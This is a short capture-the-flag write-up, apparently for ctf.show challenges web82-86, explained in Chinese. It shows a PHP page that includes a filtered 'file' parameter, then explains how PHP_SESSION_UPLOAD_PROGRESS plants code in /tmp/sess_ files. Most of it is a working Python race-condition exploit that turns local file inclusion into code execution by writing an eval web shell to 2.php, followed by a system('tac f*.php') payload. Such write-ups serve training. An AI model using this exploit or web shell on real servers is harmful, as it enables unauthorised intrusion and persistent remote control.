web82-86
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}这题使用到了PHP_SESSION_UPLOAD_PROGRESS这个参数,这个参数是为了事实获得文件上传的进度的,即使没有开启session,只要我们上传的cookie里带有PHPSESSID,他就会在默认目录生成对应文件/tmp/sess_xxxxx,这样我们就可以控制文件名字,控制文件内容我们就需要使用PHP_SESSION_UPLOAD_PROGRESS。如果PHP_SESSION_UPLOAD_PROGRESS=>”123”->/tmp/sess-xxx->123。
直接使用脚本
import io,threading,requests
url = 'http://bb5282b9-dc00-44d5-98f0-1c93ed240d67.challenge.ctf.show:8080/'
sessionid = 'test'
data = {
'1':'file_put_contents("/var/www/html/2.php","<?php eval(\$_POST[2]);?>");'
}
def write(session):
while 1:
fileBytes = io.BytesIO(b'a'*1024*500)
response = session.post(url,data={
"PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[1]);?>"
},
cookies = {
'PHPSESSID':sessionid
},
files = {
'file':('test.jpg',fileBytes)
})
# print(response.text)
def read(session):
while 1:
response = session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
cookies = {
'PHPSESSID':sessionid
} )
response2 = session.get(url+'2.php')
if response2.status_code == 200:
print("+++++++++++done+++++++++++")
else:
print(response2.status_code)
if __name__ == '__main__':
event = threading.Event()
with requests.session() as session:
for i in range(5):
threading.Thread(target=write,args=(session,)).start()
for i in range(5):
threading.Thread(target=read, args=(session,)).start()
event.set()然后访问2.php,payload2=system('tac f*.php');就可以了
